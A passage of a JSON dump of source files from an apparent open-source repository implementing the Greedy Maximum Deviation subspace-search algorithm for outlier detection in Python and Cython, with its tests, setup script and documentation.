return res, contrasts\n"
},
{
"alpha_fraction": 0.7258883118629456,
"alphanum_fraction": 0.7309644818305969,
"avg_line_length": 20.88888931274414,
"blob_id": "2d7d08c721f2bd680d8ca7f2487e8d105ade1eb6",
"content_id": "e733d5e5102c75dcc1dff61ab553a2233f0ebf15",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 9,
"path": "/tests/context.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"../gmd\")))\n\nfrom gmd import *\nfrom incsortedindex import *\nfrom evaluation import *\nimport libgmdc\n"
},
{
"alpha_fraction": 0.6096892356872559,
"alphanum_fraction": 0.6128884553909302,
"avg_line_length": 31.176469802856445,
"blob_id": "f84631c06c8aa672f90053cef671dc3edcb4f4a3",
"content_id": "fffc2309cae5c17e9ab774e299624ed5c014b3c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2188,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 68,
"path": "/setup.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\"\"\"A scikit-learn compatible python/cython implementation of the GMD algorithm.\"\"\"\n\nimport codecs\nimport os\n\nimport numpy as np\nfrom setuptools import find_packages, setup\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n\nDISTNAME = 'gmd'\nDESCRIPTION = 'A scikit-learn compatible python/cython implementation of the GMD algorithm.'\nwith codecs.open('README.rst', encoding='utf-8-sig') as f:\n LONG_DESCRIPTION = f.read()\nMAINTAINER = 'Florian Kalinke'\nMAINTAINER_EMAIL = '[email protected]'\nURL = 'https://github.com/FlopsKa/gmd'\nLICENSE = 'MIT'\nDOWNLOAD_URL = 'https://github.com/FlopsKa/gmd'\nVERSION = '0.0.1'\nINSTALL_REQUIRES = ['numpy', 'scipy', 'scikit-learn']\nCLASSIFIERS = ['Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 3.7']\nEXTRAS_REQUIRE = {\n 'tests': [\n 'pytest',\n 'pytest-cov',\n 'pandas'],\n 'docs': [\n 'sphinx',\n 'sphinx-gallery',\n 'sphinx_rtd_theme',\n 'numpydoc',\n 'matplotlib'\n ]\n}\n\nsetup(name=DISTNAME,\n maintainer=MAINTAINER,\n maintainer_email=MAINTAINER_EMAIL,\n description=DESCRIPTION,\n license=LICENSE,\n url=URL,\n version=VERSION,\n download_url=DOWNLOAD_URL,\n long_description=LONG_DESCRIPTION,\n zip_safe=False, # the package can run out of an .egg file\n classifiers=CLASSIFIERS,\n packages=find_packages(),\n install_requires=INSTALL_REQUIRES,\n extras_require=EXTRAS_REQUIRE,\n ext_modules=[\n Extension('libgmdc',\n sources=['gmd/libgmdc.pyx'],\n extra_compile_args=['-O3', '-ffast-math'],\n language='c')\n ],\n include_dirs=[np.get_include()],\n cmdclass={'build_ext': build_ext})\n"
},
{
"alpha_fraction": 0.7808219194412231,
"alphanum_fraction": 0.7808219194412231,
"avg_line_length": 20.899999618530273,
"blob_id": "c1937afc3199ccc6e48ad510fe276f76140581ae",
"content_id": "aca5869d79b2bd8c40dae0fc72431032771e69f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 10,
"path": "/tests/test_common.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import pytest\n\nfrom sklearn.utils.estimator_checks import check_estimator\n\nfrom .context import *\n\n\[email protected](\"Estimator\", [GMD])\ndef test_all_estimators(Estimator):\n return check_estimator(Estimator)\n"
},
{
"alpha_fraction": 0.6008026599884033,
"alphanum_fraction": 0.6258262395858765,
"avg_line_length": 32.1015625,
"blob_id": "8058a39f3582cf4de0abadb19daace7f298f08e1",
"content_id": "356a738d3b36513b26639b622c3b919669c7adfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4236,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 128,
"path": "/gmd/libgmdc.pyx",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "#!python\n#cython: language_level=3, cdivision=True, boundscheck=False, wraparound=False, nonecheck=False\n\nimport cython\ncimport numpy as np\nimport numpy\nfrom libc.math cimport abs, ceil, pow\nfrom libc.stdlib cimport rand, srand\nfrom libc.limits cimport INT_MAX\n\nctypedef np.int32_t int32\nctypedef np.float64_t float64\nctypedef np.uint8_t uint8\n\ncdef extern from \"time.h\":\n long int time(int)\n\ndef set_seed(seed):\n if seed is None:\n srand(time(0))\n else:\n srand(seed)\n\ncdef int32 my_sum(uint8[:] view):\n cdef int32 i = 0, acc = 0\n for i in range(len(view)):\n acc += view[i]\n return acc\n\ncpdef float64 kstest(uint8[:] view, int32[:] sorted_index):\n \"\"\"\n Compute the Kolmogorov-Smirnov statistic on 2 samples. Assumes no ties.\n\n Parameters\n ----------\n view : 1-D array\n view is a logical array specifying the samples to include\n sorted_index : 1-D array\n the sorted Index\n\n Returns\n -------\n statistic : float\n \"\"\"\n cdef float64 cum_dist = 0.0\n cdef float64 max_dist = 0.0\n cdef int32 remaining = my_sum(view)\n cdef int32 total = sorted_index.shape[0]\n\n cdef int32 i = 0\n for i in range(total):\n if view[sorted_index[i]]:\n cum_dist += 1.0/remaining\n current_diff = abs(((i + 1.0)/total) - cum_dist)\n if current_diff > max_dist:\n max_dist = current_diff\n return max_dist\n\ncpdef subspace_slice(int32[:,:] sorted_index, int32[:] subspaces, int32 reference_dim, float64 alpha):\n \"\"\"\n Cuts a hypercube out of the full space and returns the contained data points.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n 1-D array with the length of the object count. If 1 the object is in the cube, if 0 it isn't\n \"\"\"\n return subspace_slice_oldest(sorted_index, subspaces, reference_dim, alpha)[0]\n\ncpdef subspace_slice_oldest(int32[:,:] sorted_index, int32[:] subspaces, int32 reference_dim, float64 alpha):\n \"\"\"\n Cuts a hypercube out of the full space and returns the contained data points.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n 1-D array with the length of the object count. If 1 the object is in the cube, if 0 it isn't\n \"\"\"\n cdef int32 rows = sorted_index.shape[0]\n cdef int32 slice_size = <int>ceil(rows * (pow(alpha, (1.0/(len(subspaces)-1)))))\n cdef uint8[:] selection = numpy.ones(rows, dtype=numpy.uint8)\n cdef int32 s, l, r, j, i\n cdef int32 smallest_contained_index = INT_MAX\n for i in range(len(subspaces)):\n s = subspaces[i]\n if s != reference_dim:\n l = rand() % (rows - slice_size)\n r = l + slice_size\n for j in range(0, l):\n selection[sorted_index[j, s]] = 0\n for j in range(r, rows):\n selection[sorted_index[j, s]] = 0\n\n # find the oldest index in the current slice\n # search across all slices (dimension-unaware)\n for j in range(l+1, r+1):\n if sorted_index[j, s] < smallest_contained_index:\n smallest_contained_index = sorted_index[j, s]\n return selection, smallest_contained_index\n\ncpdef avg_deviation(int32[:,:] sorted_index, int32[:] subspaces, int32 reference_dim, float64 alpha, int32 runs):\n \"\"\"\n Compute the deviation in a subspace given the reference dimension.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n float with the deviation of the subspaces wrt. the reference_dim\n \"\"\"\n cdef float64 result = 0.0\n cdef uint8[:] my_slice\n cdef int32[:] ref = sorted_index[:, reference_dim]\n for _ in range(runs):\n my_slice = subspace_slice(sorted_index, subspaces, reference_dim, alpha)\n result = result + kstest(my_slice, ref)\n return result/runs"
},
{
"alpha_fraction": 0.4756242632865906,
"alphanum_fraction": 0.5517241358757019,
"avg_line_length": 34,
"blob_id": "e89bf801d44a723b7e823e275877f80c15fa8aac",
"content_id": "9647d9a6770200bc57da39eca2ae16b74a44bddf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 24,
"path": "/tests/test_evaluation.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import unittest\nimport numpy as np\nimport pandas as pd\n\nfrom .context import *\n\n\nclass TestEvaluation(unittest.TestCase):\n def test_compute_jaccard_coeff(self):\n s1, s2, s3 = set([0, 1]), set([0, 2]), set([2, 3])\n\n np.testing.assert_almost_equal(jaccard_coeff(s1, s2), 1 / 3)\n np.testing.assert_almost_equal(jaccard_coeff(s1, s1), 1.0)\n np.testing.assert_almost_equal(jaccard_coeff(s1, s3), 0.0)\n\n def test_compute_sim_matrix(self):\n s1, s2, s3 = set([0, 1]), set([0, 2]), set([2, 3])\n df1 = pd.DataFrame({\"C0\": [s1, s2], \"C1\": [s2, s3], \"C2\": [s3, s1]})\n df2 = pd.DataFrame({\"C0\": [s1, s2], \"C1\": [s3, s1], \"C2\": [s1, s2]})\n\n np.testing.assert_array_almost_equal(\n similarity_matrix(df1, df2),\n np.array([[1.0, 1 / 3, 0.0], [1.0, 0.0, 1 / 3]]),\n )\n\n"
},
{
"alpha_fraction": 0.5081276297569275,
"alphanum_fraction": 0.5189644694328308,
"avg_line_length": 36.75,
"blob_id": "9f2007a8ecc9336a73cbd888d1f0902bea8f6443",
"content_id": "04473f6de307e9f5b79a90eb4433825ff9d70503",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1661,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 44,
"path": "/gmd/incsortedindex.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass IncSortedIndex:\n def __init__(self, start_data):\n my_sorted = np.concatenate(\n [start_data, np.array([range(0, len(start_data))]).T], axis=1\n )\n # Zeilen x Spalten x Tupel\n res = np.zeros((len(start_data), start_data.shape[1], 2))\n # Sort first window\n for col in range(start_data.shape[1]):\n my_sorted = my_sorted[my_sorted[:, col].argsort(kind=\"mergesort\")]\n res[:, col] = my_sorted[:, [col, -1]]\n self.res = res\n self.window_size = len(res)\n self.col_count = start_data.shape[1]\n\n def del_and_ins_sorted(self, new_value):\n for col in range(self.col_count):\n # search in indexes:\n delete_idx = np.argmin(self.res[:, col, 1]) \n # search in values:\n insert_idx = np.searchsorted(\n self.res[:, col, 0], new_value[col]\n ) \n\n if delete_idx == insert_idx:\n self.res[insert_idx, col] = [new_value[col], self.window_size]\n\n elif delete_idx < insert_idx:\n for i in range(delete_idx, insert_idx - 1):\n self.res[i, col] = self.res[i + 1, col]\n self.res[insert_idx - 1, col] = [new_value[col], self.window_size]\n\n elif delete_idx > insert_idx:\n for i in reversed(range(insert_idx, delete_idx)):\n self.res[i + 1, col] = self.res[i, col]\n self.res[insert_idx, col] = [new_value[col], self.window_size]\n self.res[:, :, 1] -= 1\n\n @property\n def sorted(self):\n return self.res[:, :, 1].astype(np.int32)\n"
},
{
"alpha_fraction": 0.7002801299095154,
"alphanum_fraction": 0.7516340017318726,
"avg_line_length": 37.21428680419922,
"blob_id": "bbc0849aeda5899c7f2977287729371148e56599",
"content_id": "18102ee9e2107dcdbee0b6faa601f32a0af1f69d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1071,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 28,
"path": "/docs/index.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": ".. StreamGMD documentation master file, created by\n sphinx-quickstart on Mon May 20 20:04:41 2019.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to StreamGMD's documentation!\n=====================================\n\nThis project provides a scikit-learn compatible python implementation of the\nalgorithm presented in [`Trittenbach2018`_] together with some usage examples\nand a reproduction of the results from the paper.\n\nRecent approaches in outlier detection seperate the subspace search from the\nactual outlier detection and run the outlier detection algorithm on a\nprojection of the original feature space. See [`Keller2012`_]. As a result the\ndetection algorithm (Local Outlier Factor is used in the paper) does not suffer\nfrom the curse of dimensionality.\n\n\n.. _Trittenbach2018: https://link.springer.com/article/10.1007/s41060-018-0137-7\n.. _Keller2012: https://ieeexplore.ieee.org/document/6228154\n\n.. toctree::\n :maxdepth: 2\n :caption: Contents:\n\n quick_start\n user_guide\n\n"
},
{
"alpha_fraction": 0.583984375,
"alphanum_fraction": 0.638671875,
"avg_line_length": 19.479999542236328,
"blob_id": "4a6833ac61eab60ae674a5b6d7030eaef65660e3",
"content_id": "c4d39a6a207b4c59a02ab7a6093effdb0b56d9bd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 512,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 25,
"path": "/tests/test_gmd.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import pytest\nimport numpy as np\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.utils.testing import assert_dict_equal\n\nfrom .context import *\n\n\[email protected]\ndef data():\n return load_iris(return_X_y=True)\n\n\ndef test_gmd_estimator(data):\n est = GMD(runs=1000, random_state=1234)\n assert est.alpha == 0.1\n assert est.runs == 1000\n\n est.fit(*data)\n assert hasattr(est, \"is_fitted_\")\n\n assert_dict_equal(\n est.subspaces_, {0: [0, 2, 3], 1: [1, 3, 2], 2: [2, 3], 3: [3, 2]}\n )\n"
},
{
"alpha_fraction": 0.5801630616188049,
"alphanum_fraction": 0.5930706262588501,
"avg_line_length": 35.18852615356445,
"blob_id": "a6146cbb406680bacb979d1ea83340a9c19970be",
"content_id": "88030d6287eb408711b62b8af78bf63cc9f0696a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4416,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 122,
"path": "/gmd/incremental.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "from collections import deque\nimport numpy as np\nfrom libgmdc import subspace_slice, set_seed, kstest, subspace_slice_oldest\nfrom .incsortedindex import IncSortedIndex\n\n\nclass IncSubspaceContrast:\n def __init__(self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234):\n self.subspace = subspace\n self.ref_dim = np.int32(ref_dim)\n self.alpha = alpha\n\n self.sorted_index = IncSortedIndex(data)\n\n self.seed = seed\n set_seed(seed)\n\n self.iterations = iterations\n self.init_result()\n\n def insert_and_shift(self, new_point):\n self.sorted_index.del_and_ins_sorted(new_point)\n return self.shift(new_point)\n\n def shift(self, new_point):\n pass\n\n def init_result(self):\n self.res = np.zeros((self.iterations, 1))\n for i in range(self.iterations):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n\n\nclass EvictedSubspaceContrast(IncSubspaceContrast):\n def __init__(self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234):\n super().__init__(data, subspace, ref_dim, iterations, alpha, seed)\n self.len_evicted = []\n self.variances = []\n\n def init_result(self):\n self.res = np.zeros((self.iterations, 2))\n for i in range(self.iterations):\n curr_slice, oldest = subspace_slice_oldest(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i, 1] = oldest\n self.res[i, 0] = kstest(\n curr_slice, self.sorted_index.sorted[:, self.ref_dim]\n )\n\n def shift(self, new_point):\n self.res[:, 1] -= 1\n evicted = np.where(self.res[:, 1] == -1)[0]\n self.len_evicted.append(len(evicted))\n self.variances.append(self.res[evicted, 0])\n for i in evicted:\n curr_slice, oldest = subspace_slice_oldest(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i, 1] = oldest\n self.res[i, 0] = kstest(\n curr_slice, self.sorted_index.sorted[:, self.ref_dim]\n )\n return np.mean(self.res[:, 0])\n\n\nclass ReplaceOldestSubspaceContrast(IncSubspaceContrast):\n def __init__(\n self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234, k=10\n ):\n super().__init__(data, subspace, ref_dim, iterations, alpha, seed)\n self.k = k\n\n def shift(self, new_point):\n for i in range(self.k):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res.append(\n kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n )\n return np.mean(self.res)\n\n def init_result(self):\n res = np.zeros((self.iterations, 1))\n for i in range(self.iterations):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n self.res = deque(res, self.iterations)\n\n\nclass OriginalGMDSubspaceContrast(IncSubspaceContrast):\n def shift(self, new_point):\n for i in range(self.iterations):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n return np.mean(self.res)\n\n\nclass ReplaceRandomSubspaceContrast(IncSubspaceContrast):\n def __init__(\n self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234, draws=50\n ):\n super().__init__(data, subspace, ref_dim, iterations, alpha, seed)\n self.draws = draws\n\n def shift(self, new_point):\n to_replace = np.random.randint(0, self.iterations, self.draws)\n for i in to_replace:\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n\n return np.mean(self.res)\n\n"
},
{
"alpha_fraction": 0.5974165797233582,
"alphanum_fraction": 0.6135629415512085,
"avg_line_length": 24.80555534362793,
"blob_id": "366abda4d6e287bc1ae6e03c5d77fbfa8b53a6fd",
"content_id": "f7b6f4098faf92d11fa16041e585d31b60fb7b67",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 929,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 36,
"path": "/docs/user_guide.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": ".. title:: User guide\n\n.. _user_guide:\n\n==============\nUsage Examples\n==============\n\nUse subspaces as LoF input\n--------------------------\n\n::\n\n import numpy as np\n import pandas as pd\n from sklearn.preprocessing import LabelEncoder\n import sklearn.metrics as metrics\n from sklearn.datasets import kddcup99\n from sklearn.neighbors import LocalOutlierFactor\n from gmd import GMD\n\n kdd = kddcup99.fetch_kddcup99(subset='SA')\n df = pd.DataFrame(kdd.data)\n df[[1,2,3]] = df[[1,2,3]].apply(LabelEncoder().fit_transform)\n df = df.apply(lambda x : pd.to_numeric(x))\n y_true = kdd.target != b'normal.'\n\n gmd = GMD()\n gmd.fit(df)\n\n subspaces = gmd.subspaces_\n preds = np.zeros((df.shape[0],len(subspaces)))\n for k, v in subspaces.items():\n clf.fit(df.iloc[:,subspaces[k]])\n preds[:,k] = clf.negative_outlier_factor_\n metrics.roc_auc_score(y_true, preds.sum(axis=1)*-1)\n"
},
{
"alpha_fraction": 0.7077702879905701,
"alphanum_fraction": 0.7353603839874268,
"avg_line_length": 42.29268264770508,
"blob_id": "0f7af8f5c00ddf9bb97b9d0a7cd07a41c1f526b0",
"content_id": "e651e7b0e6efb5bede8802b2c3f01beaa9a802dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1776,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 41,
"path": "/README.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": ".. -*- mode: rst -*-\n\n|Travis|_ |AppVeyor|_ |Codecov|_ |CircleCI|_ |ReadTheDocs|_\n\n.. |Travis| image:: https://travis-ci.com/FlopsKa/gmd.svg?branch=master\n.. _Travis: https://travis-ci.com/FlopsKa/gmd\n\n.. |AppVeyor| image:: https://ci.appveyor.com/api/projects/status/84j8gekk5ob3i28d/branch/master?svg=true\n.. _AppVeyor: https://ci.appveyor.com/project/FlopsKa/gmd/\n\n.. |Codecov| image:: https://codecov.io/gh/FlopsKa/gmd/branch/master/graph/badge.svg\n.. _Codecov: https://codecov.io/gh/FlopsKa/gmd\n\n.. |CircleCI| image:: https://circleci.com/gh/FlopsKa/gmd.svg?style=shield&circle-token=:circle-token\n.. _CircleCI: https://circleci.com/gh/FlopsKa/gmd/tree/master\n\n.. |ReadTheDocs| image:: https://readthedocs.org/projects/gmd/badge/?version=latest\n.. _ReadTheDocs: https://gmd.readthedocs.io/en/latest/?badge=latest\n\nScikit-learn Greedy Maximum Deviation (GMD) Algorithm\n=====================================================\n\n.. _scikit-learn: https://scikit-learn.org\n\nThis project provides a `scikit-learn`_ compatible python implementation of the\nalgorithm presented in [`Trittenbach2018`_] together with some usage examples\nand a reproduction of the results from the paper.\n\nRecent approaches in outlier detection seperate the subspace search from the\nactual outlier detection and run the outlier detection algorithm on a\nprojection of the original feature space. See [`Keller2012`_]. As a result the\ndetection algorithm (Local Outlier Factor is used in the paper) does not suffer\nfrom the curse of dimensionality.\n\n\n.. _Trittenbach2018: https://link.springer.com/article/10.1007/s41060-018-0137-7\n.. _Keller2012: https://ieeexplore.ieee.org/document/6228154\n\n.. _documentation: https://gmd.readthedocs.io/en/latest/\n\nRefer to the documentation_ to see usage examples.\n\n"
},
{
"alpha_fraction": 0.4465571939945221,
"alphanum_fraction": 0.49049264192581177,
"avg_line_length": 30.2702693939209,
"blob_id": "c1ff6c18228cc15bcfe21564a43db41d089c3e7d",
"content_id": "f3cf94369e812b1a7d5a643fabbed36ccc265361",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6942,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 222,
"path": "/tests/test_compare_with_r.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import os\nimport unittest\nimport pandas as pd\nimport numpy as np\nimport numpy.testing as npt\n\nfrom .context import *\nfrom .context import libgmdc\n\n\nclass TestGMD(unittest.TestCase):\n \"\"\"\n Test the GMD implementation. The implementation is based on the original\n implementation from the paper: https://github.com/holtri/R-subcon\n \"\"\"\n\n def test_create_sorted(self):\n unsorted = np.array([[0, 3, 2], [1, 0, 3], [3, 2, 0]])\n greedy = GMD(random_state=1234)\n greedy.fit(unsorted)\n self.assertEqual(greedy._sorted.tolist(), [[0, 1, 2], [1, 2, 0], [2, 0, 1]])\n\n def test_kstest_with_ties(self):\n \"\"\"\n Compare the output of the cython kstest implementation to the output of\n the original implementation.\n \"\"\"\n view = np.array(\n [\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n True,\n False,\n True,\n False,\n ],\n dtype=np.uint8,\n )\n data = np.array(\n [\n 0.00,\n 0.21,\n 0.06,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n 0.15,\n 0.06,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n ]\n )\n sorted_index = np.argsort(data, kind=\"mergesort\")\n distance = libgmdc.kstest(view, sorted_index.astype(np.int32))\n self.assertAlmostEqual(distance, 0.466666666666667)\n\n def test_kstest_without_ties(self):\n \"\"\"\n Compare the output of the cython kstest implementation to the output of\n the original implementation.\n \"\"\"\n view = np.array(\n [\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n True,\n False,\n True,\n False,\n ],\n dtype=np.uint8,\n )\n data = np.array(\n [\n 0.01,\n 0.21,\n 0.06,\n 0.02,\n 0.03,\n 0.04,\n 0.05,\n 0.07,\n 0.15,\n 0.08,\n 0.09,\n 0.10,\n 0.11,\n 0.12,\n 0.13,\n ]\n )\n sorted_index = np.argsort(data, kind=\"mergesort\")\n distance = libgmdc.kstest(view, sorted_index.astype(np.int32))\n self.assertAlmostEqual(distance, 0.6)\n\n def test_compare_kstest_with_r(self):\n dist = np.array([1, 1, 4, 1, 9])\n selection = np.array([False, True, False, False, False], dtype=np.uint8)\n sort = np.argsort(dist)\n self.assertEqual(libgmdc.kstest(selection, sort.astype(np.int32)), 0.6)\n\n def test_compare_kstest_with_r_two_selected(self):\n dist = np.array([1, 1, 4, 1, 9])\n selection = np.array([False, True, True, False, False], dtype=np.uint8)\n sort = np.argsort(dist)\n self.assertEqual(libgmdc.kstest(selection, sort.astype(np.int32)), 0.2)\n\n def test_compare_kstest_with_r_all_selected(self):\n dist = np.array([1, 1, 4, 1, 9])\n selection = np.array([True, True, True, True, True], dtype=np.uint8)\n sort = np.argsort(dist)\n self.assertAlmostEqual(libgmdc.kstest(selection, sort.astype(np.int32)), 0.0)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_compare_kstest_with_slice_from_r(self):\n r_slice = pd.read_csv(\"tests/res/slice_from_r_0.71789.csv\", header=None).values\n r_slice = r_slice[:, 0].astype(np.uint8)\n\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n greedy = GMD(random_state=1234).fit(data)\n\n self.assertAlmostEqual(libgmdc.kstest(r_slice, greedy._sorted[:, 0]), 0.7178874)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_sorted_is_the_same_as_in_r(self):\n compare = np.array(\n [\n [0, 3, 3, 3, 10],\n [3, 4, 4, 4, 17],\n [4, 5, 5, 5, 20],\n [5, 6, 6, 6, 24],\n [6, 7, 7, 7, 26],\n [7, 10, 10, 10, 27],\n [10, 11, 13, 13, 28],\n [11, 13, 16, 16, 33],\n [12, 14, 17, 17, 55],\n [13, 16, 20, 20, 56],\n ]\n )\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n greedy = GMD(random_state=1234).fit(data)\n npt.assert_array_equal(greedy._sorted[0:10], compare)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_avg_deviation_statistics(self):\n \"\"\"\n Compares the output from the R deviation computation to the output of\n the new implementation by using the data in res/dt_uniform.csv.\n\n The csv is created using R and the following commands:\n\n library(data.table)\n library(subcon)\n dt <- fread('tests/res/spambase_small.data')\n indexMatrix <- sortedIndexMatrix(dt)\n out <- deviationStatisticsC(indexMap = indexMatrix, alpha=0.1, numRuns=10000)['avg']\n write.csv(out, file='tests/res/deviations_compare_with_R.csv')\n \"\"\"\n comp = pd.read_csv(\n \"tests/res/deviations_compare_with_R.csv\", index_col=0\n ).values\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n greedy = GMD(runs=1000, random_state=1234).fit(data)\n res = greedy._deviation_matrix()\n\n npt.assert_almost_equal(comp, res, decimal=2)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_gmd_1(self):\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n\n greedy = GMD(alpha=0.1, runs=1000, random_state=1234)\n greedy.fit(data)\n subspaces, _ = greedy._max_deviation_subspaces(4)\n self.assertEqual(subspaces, [4, 3, 2]) # computed with R impl\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.7792207598686218,
"alphanum_fraction": 0.7792207598686218,
"avg_line_length": 24.66666603088379,
"blob_id": "eae7dc7a0c80353f0861f664ca6b932f356c85d9",
"content_id": "c569a55c4b45cdf13066bebf28a8d91d014656d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 3,
"path": "/gmd/__init__.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "from gmd.gmd import *\nfrom gmd.incsortedindex import *\nfrom libgmdc import *\n"
},
{
"alpha_fraction": 0.6052631735801697,
"alphanum_fraction": 0.6435406804084778,
"avg_line_length": 26.866666793823242,
"blob_id": "74762b90571d0af67eea47334f1b0c5d7ced890a",
"content_id": "73fcac3c103740eafc928283fa82f9dee5b3b9ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 15,
"path": "/gmd/evaluation.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef jaccard_coeff(s1: set, s2: set) -> float:\n return len(s1.intersection(s2)) / len(s1.union(s2))\n\n\ndef similarity_matrix(df1, df2):\n assert df1.shape == df2.shape\n assert df1.columns.tolist() == df2.columns.tolist()\n\n matrix = np.zeros(df1.shape)\n for i, col in enumerate(df1.columns):\n matrix[:, i] = [jaccard_coeff(*s) for s in zip(df1[col], df2[col])]\n return matrix\n"
},
{
